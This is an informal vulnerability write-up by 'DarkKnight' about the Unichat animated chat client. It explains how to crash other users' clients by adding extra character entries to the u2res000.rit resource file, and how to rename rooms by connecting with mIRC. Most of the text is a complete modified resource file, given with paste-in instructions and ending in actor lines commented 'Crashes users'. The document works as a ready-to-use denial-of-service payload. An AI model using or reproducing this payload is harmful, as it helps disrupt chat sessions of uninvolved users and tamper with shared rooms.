Unichat Vulnerabilities
Author: DarkKnight
My site: http://www.insecureonline.com
Product: Unichat
Vendor Info.: Did not respond
//Quote// "Come here," said the Spider to the Fly.
Respected (Just a few):
-------------------
http://securityfocus.com
http://eeye.com
http://packetstormsecurity.nl
http://jinxhackwear.com
http://mod-x.com
-------------------
A program called Unichat suffers from many problems. Firstly, let me explain
what Unichat basically is. Unichat is an animated chatting program that has
many IRC characteristics.
Unichat's main problem is its inabilitiy to handle characters (not letters)
correctly. If an attacker was to add additional characters to the application,
which can be done through modifying u2res000.rit, all the user's applications
in whichever chatroom the attacker visits, would crash.
Fix for Above: Add more characters to your u2res000.rit to prevent
crashing...the more you add, the slower your Unichat may be (especially on the
character select screen, which is why you should modify the registry to select
the characters).
Remember how I said that Unichat has many IRC characteristics? Well, if someone
were to sign on the Unichat server with mIRC, they would be able to change the
topic, or in this case, the room name of any room desired, the exception being
rooms with weird alt characters in it. Why is this? All Unichat rooms
automatically do not have "Only ops set Topic" set. (Note: To get a list of
rooms, use the command "/names", it wont show up in "/list". Each room is
prefixed with "%#" instead of "#".)
Many more vulnerabilities exist, but the ones I listed are the main ones. I'm
not sure if you would call being able to change room names a vulnerability
because of how you go about doing it, but I listed it anyways.
##########################################
##### Sample Character Drop Code #####
##### Open u2res000.rit with notepad #####
##### Replace code with below #####
##### - DarkKnight #####
##########################################
// Author: DarkKnight
// WebSite: http://www.insecureonline.com
// Comments: This vulnerability is old, many now know of it.
// Vendor: http://www.unichat.com
; "u2res000.rit"
#VERSION=1.00;
#TIL= // TILE
#
#
{
t00|tcity001=(1,7);
t00|tcity002=(1,5);
t00|tcosm001=(3,7);
t00|tgras001=(1,11);
t00|tgras002=(1,5);
t00|tgras003=(1,2);
t00|tgras004=(1,7);
t00|tgras005=(1,6);
t00|tgras006=(2,7);
t00|tmoun001=(2,10);
t00|tmoun002=(1,13):
t00|troom001=(1,12);
t00|troom002=(1,12);
t00|troom003=(1,11);
t00|troom004=(1,6);
t00|troom005=(1,8);
t00|troom006=(1,11);
t00|troom007=(1,9);
t00|twint001=(1,1);
}
#STT=
{
ca00|cadve001=(10,78);
ca00|cadve006=(23,115);
ca00|cbill001=(32,98);
ca00|ccast002=(106,114);
ca00|ccasw001=(22,30);
ca00|ccasw002=(24,31);
ca00|ccasw003=(8,40);
ca00|ccasw004=(8,40);
ca00|ccasw005=(22,30);
ca00|ccasw006=(24,31);
ca00|ccasw007=(8,40);
ca00|ccasw008=(7,40);
ca00|cceme102=(35,58);
ca00|cceme103=(11,66);
ca00|cceme105=(15,75);
ca00|cceme107=(30,80);
ca00|cceme108=(15,75);
ca00|cceme110=(35,58);
ca00|cceme601=(8,28);
ca00|cceme603=(8,19);
ca00|cceme604=(19,23);
ca00|cceme606=(12,16);
ca00|cceme608=(11,15);
ca00|cceme610=(12,14);
ca00|cceme612=(9,27);
ca00|cceme614=(20,21);
ca00|cceme615=(8,20);
ca00|cceme702=(14,17);
ca00|cceme705=(10,32);
ca00|cceme706=(23,23);
ca00|cceme707=(8,23);
ca00|cceme708=(8,22);
ca00|cceme710=(14,17);
ca00|cceme712=(10,32);
ca00|cceme714=(25,25);
ca00|cceme715=(8,22);
ca00|cceme716=(9,22);
ca00|cchan001=(23,76);
ca00|cchan002=(44,14);
ca00|ccrem001=(125,112);
cd00|cdwwa001=(18,59);
cd00|cdwwa002=(31,99);
cd00|cdwwa003=(29,99);
cd00|cdwwa004=(31,99);
cd00|cdwwa005=(31,99);
cd00|cdwwa006=(31,99);
cd00|cdwwa007=(31,99);
cd00|cdwwa008=(31,99);
cd00|cdwwa009=(31,99);
cd00|ceast001=(8,44);
cd00|ceast002=(15,49);
cd00|ceast003=(8,46);
cd00|ceast004=(9,47);
cd00|ceast006=(11,51);
cd00|ceast007=(10,43);
cd00|ceast009=(15,38);
cd00|ceast011=(8,47);
cd00|ceast015=(30,89);
cd00|ceast017=(12,63);
cd00|ceast018=(12,56);
cd00|ceast020=(15,83);
cd00|ceast024=(15,83);
cd00|cfurn001=(48,51);
cd00|cfurn004=(28,70);
cd00|cfurn005=(7,26);
cd00|cfurn006=(10,24);
cd00|cfurn007=(10,24);
cd00|cfurn008=(10,24);
cd00|cfurn012=(32,34);
cd00|cfurn013=(32,34);
cd00|cfurn014=(32,34);
cd00|cfurn015=(28,36);
cd00|cfurn016=(28,36);
cd00|cfurn017=(28,36);
cd00|cfurn018=(13,28);
cd00|cfurn019=(13,28);
cd00|cfurn020=(13,28);
cd00|cfurn021=(13,33);
cd00|cfurn022=(13,33);
cd00|cfurn023=(13,33);
cd00|cfurn024=(13,25);
cd00|cfurn025=(13,25);
cd00|cfurn026=(13,25);
cd00|cfurn027=(31,33);
cd00|cfurn028=(41,39);
cd00|cfurn029=(34,56);
cd00|cfurn030=(16,76);
cd00|cfurn031=(16,76);
cd00|cfurn032=(14,76);
cd00|cfurn033=(14,76);
cd00|cfurn036=(14,75);
cd00|cfurn038=(50,64);
cd00|cfurn039=(37,33);
cd00|cfurn040=(37,33);
cd00|cfurn041=(37,33);
cd00|cfurn042=(20,20);
cd00|cfurn043=(20,20);
cd00|cfurn044=(20,20);
cd00|cfurn045=(16,25);
cd00|cfurn046=(22,31);
cd00|cfurn047=(22,31);
cd00|cfurn048=(22,31);
cd00|cfurn049=(28,58);
cd00|cfurn050=(35,37);
cd00|cfurn051=(21,49);
cd00|cfurn052=(10,36);
cd00|cfurn053=(33,67);
cd00|cfurn054=(10,40);
cd00|cfurn055=(10,40);
cd00|cfurn056=(10,40);
cd00|cfurn057=(10,40);
cd00|cfurn058=(10,40);
cg00|cgras001=(15,17);
cg00|cgras002=(20,19);
cg00|cgras007=(16,26);
cg00|cgras008=(16,23);
cg00|chous002=(60,70);
cg00|chous003=(68,73);
cg00|chous005=(60,70);
cg00|chous006=(68,73);
cg00|chous008=(60,70);
cg00|chous009=(68,73);
cg00|chous010=(62,47);
cg00|chous011=(63,50);
cg00|chous013=(62,47);
cg00|chous014=(63,50);
cg00|chous016=(62,47);
cg00|chous017=(63,50);
cg00|chous020=(61,67);
cg00|chous021=(55,71);
cg00|cnnwa001=(25,103);
cg00|cnnwa002=(13,100);
cg00|cnnwa003=(32,107);
cg00|cnnwa004=(10,96);
cg00|cnnwa005=(30,106);
cg00|cnnwa006=(29,105);
cg00|cnnwa007=(33,105);
cg00|cnnwa008=(12,97);
cg00|cnnwa009=(27,105);
cg00|cnnwa010=(28,106);
cg00|cnnwa011=(28,110);
cg00|cnnwa012=(24,103);
cg00|cnnwa013=(26,112);
cg00|cnnwa014=(12,99);
cg00|cnnwa015=(25,105);
cg00|cnnwa016=(26,104);
cg00|cpark001=(37,53);
cg00|cpark002=(29,19);
cg00|cpark003=(33,22);
cg00|cpark004=(14,29);
cg00|cpark005=(14,30);
cg00|cpark006=(6,25);
cg00|cpark007=(19,24);
cg00|cpark008=(24,20);
cg00|cpark009=(29,42);
cg00|cpark010=(23,42);
cg00|cpark011=(7,15);
cg00|cpark012=(10,20);
cg00|cpark013=(7,70);
cg00|cpark014=(50,63);
cg00|cpark015=(35,78);
cs00|cshad001=(24,0);
cs00|cshad002=(32,0);
cs00|cshad003=(26,0);
cs00|cshad004=(7,0);
cs00|cshad005=(12,0);
cs00|csign001=(7,81);
cs00|csign002=(7,75);
cs00|csign003=(40,84);
cs00|csign004=(41,77);
cs00|cston001=(17,67);
cs00|cston002=(10,50);
cs00|cston003=(6,31);
cs00|cston004=(15,15);
cs00|cston005=(10,10);
cs00|cston006=(14,56);
cs00|cston007=(6,7);
cs00|cston008=(27,51);
cs00|cston009=(37,48);
cs00|cston010=(12,10);
cs00|cston011=(19,12);
cs00|cston012=(8,52);
cs00|cston013=(20,10);
cs00|cston014=(7,36);
cs00|cston015=(10,49);
cs00|cston016=(24,68);
cs00|cston017=(27,64);
cs00|cston018=(31,59);
cs00|cston019=(27,61);
cs00|cston020=(5,6);
cs00|ctran001=(7,50);
cs00|ctran002=(7,52);
cs00|ctran003=(7,52);
cs00|ctran004=(7,48);
cs00|ctran005=(7,50);
cs00|ctran006=(9,50);
cs00|ctran008=(9,49);
cs00|ctran009=(8,47);
cs00|ctran010=(10,48);
cs00|ctran011=(29,24);
cs00|ctran012=(24,21);
cs00|ctran013=(23,19);
cs00|ctran014=(27,24);
cs00|ctran015=(28,24);
cs00|ctran016=(24,21);
cs00|ctran017=(24,21);
cs00|ctran018=(27,25);
cs00|ctran019=(33,26);
cs00|ctran020=(24,25);
cs00|ctran021=(23,26);
cs00|ctran022=(32,28);
cs00|ctran023=(33,27);
cs00|ctran024=(27,25);
cs00|ctran025=(27,25);
cs00|ctran026=(33,27);
cs00|ctree001=(10,10);
cs00|ctree002=(10,11);
cs00|ctree003=(10,10);
cs00|ctree004=(9,11);
cs00|ctree005=(12,17);
cs00|ctree006=(15,21);
cs00|ctree007=(20,28);
cs00|ctree008=(22,64);
cs00|ctree009=(29,83);
cs00|ctree011=(14,46);
cs00|ctree012=(18,58);
cs00|ctree013=(21,66);
cs00|ctree014=(28,87);
cs00|ctree016=(12,37);
cs00|ctree017=(16,48);
cs00|ctree019=(23,69);
cs00|ctree020=(5,21);
cs00|ctree021=(9,33);
cs00|ctree022=(12,50);
cs00|ctree023=(13,58);
cs00|ctree024=(24,65);
cs00|ctree026=(22,68);
cs00|ctree028=(33,87);
cs00|ctree029=(25,70);
cs00|ctree031=(33,87);
cs00|ctree032=(28,71);
cs00|ctree033=(10,11);
cw00|cwall001=(34,99);
cw00|cwall002=(34,99);
cw00|cwall003=(29,100);
cw00|cwall004=(30,98);
cw00|cwall005=(30,98);
cw00|cwall006=(30,98);
cw00|cwall007=(30,98);
cw00|cwall008=(21,95);
cw00|cwall009=(17,58);
cw00|cwall010=(33,91);
cw00|cwall011=(27,58);
cw00|cwall012=(13,66);
cw00|cwall013=(34,91);
cw00|cwall014=(30,60);
cw00|cwall015=(13,66);
cw00|cwall016=(32,91);
cw00|cwall017=(28,58);
cw00|cwall018=(13,66);
cw00|cwall019=(37,90);
cw00|cwall020=(37,62);
cw00|cwall021=(36,90);
cw00|cwall022=(34,59);
cw00|cwall023=(36,91);
cw00|cwall024=(37,59);
cw00|cwall025=(26,121);
cw00|cwall026=(26,121);
cw00|cwall027=(26,121);
cw00|cwall028=(26,121);
cw00|cwall029=(26,121);
cw00|cwall030=(26,121);
cw00|cwall031=(10,115);
cw00|cwall032=(10,115);
cw00|cwint001=(14,66);
cw00|cwint002=(14,18);
cw00|cwint003=(20,18);
cw00|cwint004=(15,39);
cw00|cwint005=(9,13);
cw00|cwint006=(18,23);
cw00|cwint007=(4,3);
cw00|cwint008=(5,5);
cw00|cwint009=(15,39);
cw00|cwint010=(15,60);
cw00|cwint011=(15,60);
cw00|cwint012=(5,8);
cw00|cwint013=(5,7);
cw00|cwint014=(28,0);
cw00|cwint015=(5,3);
cw00|cwash001=(38,27);
cw00|cwash002=(72,32);
cw00|cwash003=(30,0);
cw00|cwash004=(44,48);
}
#ANI=
{
cw00|iadve001=(3,1),(110,0);
ad_tile_02=(1,4),(1,46);
cw00|iadve003=(1,4),(64,32);
cw00|iarro001=(5,1),(5,0);
cw00|ieast001=(7,1),(12,45);
cw00|ifann001=(3,1),(26,92);
cw00|ifann002=(3,1),(36,15);
cw00|ifire001=(3,1),(10,37);
cw00|ifire003=(3,1),(10,30);
cw00|igras001=(2,1),(7,7);
cw00|ircha001=(3,1),(20,36);
cw00|ircha002=(3,1),(20,23);
cw00|ircha005=(3,1),(20,36);
cw00|ircha006=(3,1),(20,23);
cw00|iston001=(3,1),(27,64);
cw00|itile001=(1,4),(32,0);
cw00|itona001=(3,1),(12,32);
cw00|iwate002=(2,1),(16,8);
cw00|iwate003=(2,1),(32,16);
cw00|wroom001=(1,17),(34,8);
cw01|iadve004=(2,1),(1,46);
}
{
a00|aman_001=(11,4),(23,45);
a00|aman_002=(11,4),(23,45);
a00|aman_003=(11,4),(23,45);
a00|aman_004=(11,4),(23,45);
a00|aman_005=(11,4),(23,45);
a00|aman_006=(11,4),(23,45);
a00|aman_007=(11,4),(23,45);
a00|aman_008=(11,4),(23,45);
a00|aman_009=(11,4),(23,45);
a00|aman_010=(11,4),(23,45);
a00|awman001=(11,4),(23,45);
a00|awman002=(11,4),(23,45);
a00|awman003=(11,4),(23,45);
a00|awman004=(11,4),(23,45);
a00|awman005=(11,4),(23,45);
a00|awman006=(11,4),(23,45);
a00|awman007=(11,4),(23,45);
a00|awman008=(11,4),(23,45);
cs00|ctree019=(11,4),(23,45);
}
#WAV=
{
sagry000;
schng000;
schng001;
schng002;
sclos000;
scrys000;
sembr000;
sembr001;
shit_000;
shit_001;
shit_002;
shit_003;
sjpdn000;
sjpdn001;
sjpup000;
sjpup001;
skiss000;
spick000;
ssexy000;
sstep000;
ssurp000;
stemp000;
stemp001;
stemp002;
stemp003;
stran000;
sturn000;
sturn001;
}
#MID=
{
mjazz000; 0
mjazz001; 1
mjazz002; 2
mjazz003; 3
mjazz004; 4
mjazz005; 5
mjazz006; 6
mcvtn000; 7
mdrmo000; 8
mfanf000; 9
mintr000; 10
mintr001; 11
mjopl000; 12
mmidi000; 13
mmidi001; 14
mmore000; 15
mmzrt000; 16
mrach000; 17
msadd000; 18
mstrs000; 19
msusp000; 20
mumch000; 21
mxmas000; 22
}
#STAGE=
{
0000csin;
0001ctrm;
blackroom;
0002ctrm;
0003ctrm;
0004ctrm;
0005ctrm;
preview;
0000casa;
0000casb;
0000cemt;
0000east;
0000haus;
0000park;
0000spac;
0000ston;
0000strt;
0000wash;
0000wint;
0001demo;
0002demo;
0003demo;
0010casa;
0010casb;
0010csin;
0010cemt;
0020casa;
0020casb;
0020cemt;
0020csin;
0020haus;
0020park;
0030casa;
0030casb;
0040casa;
1010csin;
1020csin;
2000csin;
2010csin;
2100csin;
2110csin;
2200csin;
2220csin;
3100csin;
3110csin;
3200csin;
3220csin;
4000csin;
4010csin;
}
#SERVERIP=
{
65.104.9.68;
65.104.9.68;
127.0.0.1;
}
#ACTOR=a00|aman_001,Toto,40;
{
STANDF=1,(0,2,20,10);
STANDB=1,(9,2,20,10);
STANDINGF=1,(|0,2,20,10,schng002)(/0,2)(*0,2)(#0,2)(0,2);
STANDINGB=1,(|9,2,20,10,schng002)(/9,2)(*9,2)(#9,2)(9,2);
MORPHF=1,(39,2,20,10);
MORPHB=1,(42,2,20,10);
MORPHINGF=1,(|39,2,20,10,schng000)(/39,2)(*39,2)(#39,2)(39,2);
MORPHINGB=1,(|42,2,20,10,schng001)(/42,2)(*42,2)(#42,2)(42,2);
DOZEF=0,(*21,10)(*22,10);
DOZEB=0,(*33,10)(*34,10);
WALKF=1,(1,0,8,4,sstep000)
WALKB=1,(5,0,8,4,sstep000)
UPF=1,(1,0)
UPB=1,(5,0)
DOWNF=1,(1,0)
DOWNB=1,(5,0)
MORPHWALKF=1,(40,0,8,4,sturn000)
MORPHWALKB=1,(42,0,8,4,sturn001)
CHAT=3,(10)(11)(12);
ENTER=1,(|0,3,0,0,sstep000)(/0,3)(*0,3)(#0,3)(0,1);
EXIT=1,(0,3,0,0,sstep000)(#0,3)(*0,3)(/0,3)(|0,3);
SMILE=1,(13,5,0,0,stemp000)(14)(13)(14)(13)(14);
MAD=1,(15,5,0,0,sagry000)(16)(15)(16)(15)(16);
HELLO=1,(17,10)(18);
CRY=1,(19,5,0,0,scrys000)(20)(19)(20)(19)(20);
SCRATCH=1,(23,3,0,0,stemp001)(24,2)(23,3)(24,2);
PICK=1,(29,10,0,0,spick000);
SPECIAL=1,(30,5,0,0,stemp000)(31)(32)(*32)(32)(31)(32);
WIGGLEB=2,(33)(34);
PUNCHF=3,(25,5,0,0,shit_000)(26);
PUNCHB=3,(37,5,0,0,shit_002)(38);
BEATENF=3,(25,5,0,0,shit_000)(26);;
BEATENB=3,(37,5,0,0,shit_002)(38);
}
#ACTOR=a00|aman_002, BatBoi,40;
{
MORPHWALKF=1,(1,0,8,4,sturn000)
MORPHWALKB=1,(5,0,8,4,sturn001)
SPECIAL=1,(30,5,0,0,stemp000)(31)(32)(31)(32);
}
#ACTOR=a00|aman_003, Gull,40;{}
#ACTOR=a00|aman_004, Dino,40;{}
#ACTOR=a00|aman_005, Bongun,40;{}
#ACTOR=a00|aman_006, DarkKnight,40;{}
#ACTOR=a00|aman_007, Board,40;{}
#ACTOR=a00|aman_008, Richard,40;{}
#ACTOR=a00|aman_009, Hook,40;{}
#ACTOR=a00|aman_010, Dalgong,40;{}
#ACTOR=a00|awman001, Cutie,40;{}
#ACTOR=a00|awman002, Dollie,40;{}
#ACTOR=a00|awman003, Foxie,40;{}
#ACTOR=a00|awman004, Sian,40;{}
#ACTOR=a00|awman005, Sharon,40;{}
#ACTOR=a00|awman006, Mingming,40;{}
#ACTOR=a00|awman007, Robo,40;{}
#ACTOR=a00|awman008, Uni,40;{}
#ACTOR=a00|awman008, DarkKnight,40;{} //Crashes users
#ACTOR=a00|awman008, DarkKnight2,40;{} //Crashes users